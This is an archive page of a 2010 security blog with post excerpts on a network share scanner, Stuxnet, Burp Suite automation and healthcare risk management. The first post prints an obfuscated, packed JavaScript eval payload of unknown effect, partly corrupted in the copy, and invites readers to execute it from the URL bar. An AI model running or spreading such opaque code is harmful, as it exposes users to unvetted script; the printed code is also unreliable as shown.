Monthly Archives: September 2010

Dangerous Javascript Observed in the Wild

Posted on September 29, 2010 by The Shell Shakespear in Main | Leave a comment

Today, we observed some potentially dangerous Javascript client-side code out in the wild. The code, which we were able to obtain at great lengths, is reproduced below: _0x65f5=["\x36\x3D\x5B\x22\x5C\x6A\x5C\x69\x5C\x61\x5C\x6E\x5C\x38\x5C\x62\x22\x2C\x22\x5C\x68\x5C\x61\x5C\x37\x5C\x6B\x5C\x62\x5C\x37\x5C\x6F\x5C\x66\x5C\x37\x5C\x70\x5C\x37\x5C\x67\x5C\x62\x22\x2C\x22\x5C\x6B\x5C\x38\x5C\x38\x5C\x37\x5C\x67\x5C\x39\x5C\x69\x5C\x65\x5C\x6D\x5C\x66\x5C\x39\x22\x2C\x22\x5C\x71\x5C\x72\x5C\x39\x5C\x6C\x22\x2C\x22\x5C\x6A\x5C\x61\x5C\x68\x22\x2C\x22\x5C\x63\x5C\x63\x5C\x38\x5C\x74\x5C\x79\x5C\x7A\x5C\x41\x5C\x78\x5C\x63\x5C\x65\x5C\x77\x22\x5D\x3B\x64\x3D\x75\x3B\x73\x3D\x64\x5B\x36\x5B\x31\x5D\x5D\x28\x36\x5B\x30\x5D\x29\x3B\x64\x5B\x36\x5B\x33\x5D\x5D\x5B\x36\x5B\x32\x5D\x5D\x28\x73\x29\x3B\x73\x5B\x36\x5B\x34\x5D\x5D\x3D\x36\x5B\x35\x5D\x3B\x76\x28\x30\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x7C\x7C\x7C\x5F\x30\x78\x65\x30\x61\x32\x7C\x78\x36\x35\x7C\x78\x37\x30\x7C\x78\x36\x34\x7C\x78\x37\x32\x7C\x78\x37\x34\x7C\x78\x32\x46\x7C\x7C\x78\x36\x38\x7C\x78\x36\x43\x7C\x78\x36\x45\x7C\x78\x36\x33\x7C\x78\x34\x33\x7C\x78\x37\x33\x7C\x78\x36\x31\x7C\x78\x37\x39\x7C\x78\x36\x39\x7C\x78\x34\x39\x7C\x78\x34\x35\x7C\x78\x36\x44\x7C\x78\x36\x32\x7C\x78\x36\x46\x7C\x7C\x78\x33\x33\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x76\x4F\x49\x64\x7C\x78\x37\x41\x7C\x78\x35\x33\x7C\x78\x34\x45\x7C\x78\x32\x45\x7C\x78\x37\x35","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xf47fx1,_0xf47fx2,_0xf47fx3,_0xf47fx4,_0xf47fx5,_0xf47fx6){_0xf47fx5=function (_0xf47fx3){return (_0xf47fx335?String[_0x65f5[5]](_0xf47fx3+29):_0xf47fx3.toString(36));} ;if(!_0x65f5[4][_0x65f5[6]](/^/,String)){while(_0xf47fx3–){_0xf47fx6[_0xf47fx5(_0xf47fx3)]=_0xf47fx4[_0xf47fx3]||_0xf47fx5(_0xf47fx3);} ;_0xf47fx4=[function (_0xf47fx5){return _0xf47fx6[_0xf47fx5];} ];_0xf47fx5=function (){return _0x65f5[7];} ;_0xf47fx3=1;} ;while(_0xf47fx3–){if(_0xf47fx4[_0xf47fx3]){_0xf47fx1=_0xf47fx1[_0x65f5[6]]( new RegExp(_0x65f5[8]+_0xf47fx5(_0xf47fx3)+_0x65f5[8],_0x65f5[9]),_0xf47fx4[_0xf47fx3]);} ;} ;return _0xf47fx1;} (_0x65f5[0],37,37,_0x65f5[3][_0x65f5[2]](_0x65f5[1]),0,{})); For those brave of heart, you can test and execute it directly by putting it in your URL location bar preceded by javascript: as shown below: The first thing we recognized was the degree …

Using SoftPerfect’s Network Scanner Soccer Ball to Scan Your Network for Open Shares

Posted on September 28, 2010 by David Bailey in Main | Leave a comment

SoftPerfect makes a great simple and light network scanner that can be used to scan for open shares on your network. The product page is here and the program can be downloaded here. After downloading netscan.exe, double click it to run the program. (No need to install anything.) First, you’ll need to change the account Network Scanner uses. From the Options menu, select Program Options. Then click the Shares tab and at the bottom of the window select Use specific …

The increasingly sophisticated threat landscape, is your information security program prepared?

Posted on September 26, 2010 by John Reno in Main | 1 Comment

The Washington Post reported this morning on the latest development related to Stuxnet malware. The Stuxnet code was designed from the bottom up to attack Supervisory Control and Data Acquisition (SCADA) systems, or those used to manage complex industrial networks, such as systems at power plants and chemical manufacturing facilities. The malware, which has been the subject of much discussion over the last month or so in the security and cyber war community, is capable of taking over systems that …

Advanced Burp Suite Automation

Posted on September 20, 2010 by The Shell Shakespear 1 Comment

By converting Burp Suite Professional’s session files to XML we were able to automate the analysis of the results with XMLStarlet on the command line. Using the IBurpExtender interface, we have now automated spidering and scanning in Burp as well: BurpExtender.java takes full advantage of the IBurpExtender interface and accepts a starting URL, output name, and optional cookie string on the command line. This tool will add the URL’s domain to Burp’s scope, and begin spidering the site, saving each …

Worse than useless and some thoughts on cyber war

Posted on September 19, 2010 by John Reno in Main | 1 Comment

This week the Economist featured an article about an anti-censorship product called Haystack. The product was supposed to provide anti-censorship technology. The effort was motivated by events related to the Iranian opposition movement in 2009 when activists used mobile versions of Twitter and Facebook to upload videos of police brutality and spread messages of demonstrations. The Iranian government cracked down by tracing users, blocking services and closing websites as well as arresting dissenters. Haystack entered the picture earlier this year …

Perspectives on application security and risk management

Posted on September 16, 2010 by John Reno in Main | Leave a comment

In my last blog post I discussed information security risk management and why the financial services sector aggressively adopted the practice. My recommendation was that the healthcare industry segment needs to follow suit to increase the effectiveness and efficiency of their information security programs. It is refreshing to see evidence that this is taking place. Last week at OWASP’s AppSec USA conference some leaders from the healthcare sector shared their perspectives on information security risk management. The panel session, entitled …

Why information security risk management makes sense in the healthcare industry

Posted on September 11, 2010 by John Reno in Main | 1 Comment

Lately I have been thinking about risk in the context of information security and the healthcare industry. I have written an article that you can find here about using risk management to help healthcare organizations manage their information security, privacy and compliance programs more effectively and efficiently. For the most part using risk to manage information security is new territory for the healthcare industry. Yet it has been common practice in the financial services sector for more than ten years. …